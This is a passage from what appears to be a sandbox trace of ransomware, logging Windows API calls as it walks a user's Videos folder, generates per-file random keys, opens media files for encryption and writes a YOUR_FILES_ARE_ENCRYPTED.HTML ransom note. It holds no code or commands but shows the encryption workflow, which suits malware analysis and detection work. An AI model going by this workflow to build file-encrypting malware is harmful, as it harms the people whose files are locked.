8ov6f\\wxr2rttds hm\\ge0jlnj.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e8 [0168.933] GetFileSizeEx (in: hFile=0x5e8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=78927) returned 1 [0168.933] GetProcessHeap () returned 0x270000 [0168.933] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78216c0 [0168.937] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="1F") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="66") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="44") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3C") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="98") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6B") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="0B") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="45") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="8C") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B5") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="94") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="8F") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B5") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="54") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="6E") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="18") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="10") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="F4") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="65") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="C8") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="BC") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="CB") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="EB") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="00") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="41") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="DD") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="07") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2F") returned 2 [0168.938] lstrcpyW (in: lpString1=0x7831774, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi" [0168.938] CreateIoCompletionPort (FileHandle=0x5e8, ExistingCompletionPort=0x3a0, CompletionKey=0x78216c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.938] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78216c0, lpOverlapped=0x78216c0) returned 1 [0168.938] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8ea5740, ftCreationTime.dwHighDateTime=0x1d7d79e, ftLastAccessTime.dwLowDateTime=0xcb3fbea0, ftLastAccessTime.dwHighDateTime=0x1d7e25c, ftLastWriteTime.dwLowDateTime=0xcb3fbea0, ftLastWriteTime.dwHighDateTime=0x1d7e25c, nFileSizeHigh=0x0, nFileSizeLow=0x398b, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="kTlgx2Q.mp4", cAlternateFileName="")) returned 1 [0168.938] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4") returned 77 [0168.938] lstrcmpW (lpString1="kTlgx2Q.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.939] PathFindExtensionW (pszPath="kTlgx2Q.mp4") returned=".mp4" [0168.939] lstrlenW (lpString=".mp4") returned 4 [0168.939] PathFindExtensionW (pszPath="kTlgx2Q.mp4") returned=".mp4" [0168.939] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\ktlgx2q.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ec [0168.939] GetFileSizeEx (in: hFile=0x5ec, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=14731) returned 1 [0168.939] GetProcessHeap () returned 0x270000 [0168.939] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7849818 [0168.943] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="73") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="39") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="E3") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="96") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="11") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="B1") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="9A") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="72") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="91") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E6") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="57") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="80") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="01") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="EE") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BD") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E8") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="9A") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="91") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="A1") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="73") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="2B") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A9") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="04") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="70") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F3") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2D") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="46") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="57") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="BE") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="67") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6E") returned 2 [0168.944] lstrcpyW (in: lpString1=0x78598cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4" [0168.944] CreateIoCompletionPort (FileHandle=0x5ec, ExistingCompletionPort=0x3a0, CompletionKey=0x7849818, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.945] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7849818, lpOverlapped=0x7849818) returned 1 [0168.945] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bb8690, ftCreationTime.dwHighDateTime=0x1d7e048, ftLastAccessTime.dwLowDateTime=0xeca211d0, ftLastAccessTime.dwHighDateTime=0x1d7e42b, ftLastWriteTime.dwLowDateTime=0xeca211d0, ftLastWriteTime.dwHighDateTime=0x1d7e42b, nFileSizeHigh=0x0, nFileSizeLow=0x10bff, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="l_JxA.mp4", cAlternateFileName="")) returned 1 [0168.945] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4") returned 75 [0168.945] lstrcmpW (lpString1="l_JxA.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.945] PathFindExtensionW (pszPath="l_JxA.mp4") returned=".mp4" [0168.945] lstrlenW (lpString=".mp4") returned 4 [0168.945] PathFindExtensionW (pszPath="l_JxA.mp4") returned=".mp4" [0168.945] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\l_jxa.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0168.946] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=68607) returned 1 [0168.946] GetProcessHeap () returned 0x270000 [0168.946] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7871970 [0168.950] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="31") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="9B") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="31") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D0") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="CF") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="AF") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1F") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="CD") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="55") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="01") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="6E") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="BF") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="52") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="67") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="9F") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="50") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="EC") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="9E") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="72") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="46") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="29") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="0C") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="2B") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="17") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="81") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="09") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="73") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="94") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="DD") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="CC") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="3D") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="02") returned 2 [0168.951] lstrcpyW (in: lpString1=0x7881a24, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4" [0168.951] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x3a0, CompletionKey=0x7871970, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.951] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7871970, lpOverlapped=0x7871970) returned 1 [0168.951] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb84bc50, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0xc42792f0, ftLastAccessTime.dwHighDateTime=0x1d7e0d6, ftLastWriteTime.dwLowDateTime=0xc42792f0, ftLastWriteTime.dwHighDateTime=0x1d7e0d6, nFileSizeHigh=0x0, nFileSizeLow=0xa32c, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="UpQI.swf", cAlternateFileName="")) returned 1 [0168.951] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\UpQI.swf") returned 74 [0168.951] lstrcmpW (lpString1="UpQI.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.951] PathFindExtensionW (pszPath="UpQI.swf") returned=".swf" [0168.951] lstrlenW (lpString=".swf") returned 4 [0168.951] PathFindExtensionW (pszPath="UpQI.swf") returned=".swf" [0168.951] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f049d0, ftCreationTime.dwHighDateTime=0x1d7e63d, ftLastAccessTime.dwLowDateTime=0x2aa1b590, ftLastAccessTime.dwHighDateTime=0x1d7e697, ftLastWriteTime.dwLowDateTime=0x2aa1b590, ftLastWriteTime.dwHighDateTime=0x1d7e697, nFileSizeHigh=0x0, nFileSizeLow=0x185c8, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="Vg AyopOMV.mkv", cAlternateFileName="VGAYOP~1.MKV")) returned 1 [0168.952] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\Vg AyopOMV.mkv") returned 80 [0168.952] lstrcmpW (lpString1="Vg AyopOMV.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.952] PathFindExtensionW (pszPath="Vg AyopOMV.mkv") returned=".mkv" [0168.952] lstrlenW (lpString=".mkv") returned 4 [0168.952] PathFindExtensionW (pszPath="Vg AyopOMV.mkv") returned=".mkv" [0168.952] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2b6bf0, ftCreationTime.dwHighDateTime=0x1d7e606, ftLastAccessTime.dwLowDateTime=0x7cc63360, ftLastAccessTime.dwHighDateTime=0x1d7e682, ftLastWriteTime.dwLowDateTime=0x7cc63360, ftLastWriteTime.dwHighDateTime=0x1d7e682, nFileSizeHigh=0x0, nFileSizeLow=0x176a4, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="wPVx.mp4", cAlternateFileName="")) returned 1 [0168.952] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4") returned 74 [0168.952] lstrcmpW (lpString1="wPVx.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.952] PathFindExtensionW (pszPath="wPVx.mp4") returned=".mp4" [0168.952] lstrlenW (lpString=".mp4") returned 4 [0168.952] PathFindExtensionW (pszPath="wPVx.mp4") returned=".mp4" [0168.952] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\wpvx.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0168.953] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=95908) returned 1 [0168.953] GetProcessHeap () returned 0x270000 [0168.953] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7899ac8 [0168.956] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0B") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="F1") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="74") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="13") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A5") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="59") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1B") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C9") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="37") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="ED") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="56") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F0") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="4D") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="64") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="74") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9E") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="9E") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2D") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="94") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="C4") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="E2") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="87") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="9C") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="29") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="DE") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B7") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="EC") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="9B") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="4D") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="FF") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E8") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="25") returned 2 [0168.958] lstrcpyW (in: lpString1=0x78a9b7c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4" [0168.958] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x3a0, CompletionKey=0x7899ac8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.958] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7899ac8, lpOverlapped=0x7899ac8) returned 1 [0168.958] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2b6bf0, ftCreationTime.dwHighDateTime=0x1d7e606, ftLastAccessTime.dwLowDateTime=0x7cc63360, ftLastAccessTime.dwHighDateTime=0x1d7e682, ftLastWriteTime.dwLowDateTime=0x7cc63360, ftLastWriteTime.dwHighDateTime=0x1d7e682, nFileSizeHigh=0x0, nFileSizeLow=0x176a4, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="wPVx.mp4", cAlternateFileName="")) returned 0 [0168.958] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.958] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0168.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0168.959] WriteFile (in: hFile=0x5b4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.961] CloseHandle (hObject=0x5b4) returned 1 [0168.961] GetProcessHeap () returned 0x270000 [0168.962] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0168.962] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2659cd70, ftCreationTime.dwHighDateTime=0x1d7e28b, ftLastAccessTime.dwLowDateTime=0xbfa0610, ftLastAccessTime.dwHighDateTime=0x1d7e43a, ftLastWriteTime.dwLowDateTime=0xbfa0610, ftLastWriteTime.dwHighDateTime=0x1d7e43a, nFileSizeHigh=0x0, nFileSizeLow=0x15383, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="Z_cuynB3ZGeFf6DVUXD.avi", cAlternateFileName="Z_CUYN~1.AVI")) returned 1 [0168.962] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi") returned 75 [0168.962] lstrcmpW (lpString1="Z_cuynB3ZGeFf6DVUXD.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.962] PathFindExtensionW (pszPath="Z_cuynB3ZGeFf6DVUXD.avi") returned=".avi" [0168.962] lstrlenW (lpString=".avi") returned 4 [0168.962] PathFindExtensionW (pszPath="Z_cuynB3ZGeFf6DVUXD.avi") returned=".avi" [0168.962] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.962] CreateFileW 